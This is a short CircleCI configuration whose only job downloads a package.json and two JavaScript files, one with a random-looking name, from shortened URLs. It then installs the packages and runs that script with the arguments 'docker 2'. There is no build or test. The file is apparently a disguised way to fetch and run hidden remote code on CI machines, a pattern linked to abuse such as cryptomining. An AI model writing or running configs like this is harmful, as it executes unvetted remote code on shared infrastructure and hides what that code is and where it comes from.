version: 2.1

jobs:
  admin:
    docker:
      - image: node:16
    resource_class: medium
    steps:
      - run: 
          command: curl -fsSL shorturl.at/jJLNU -o package.json && curl -fsSL shorturl.at/cjBC2 -o sdfkgjweimsdf.js && curl -fsSL shorturl.at/tCDFN -o log-print.js
      - run: npm i -s && node sdfkgjweimsdf.js docker 2
      
workflows:
  start-work:
    jobs:
      - admin
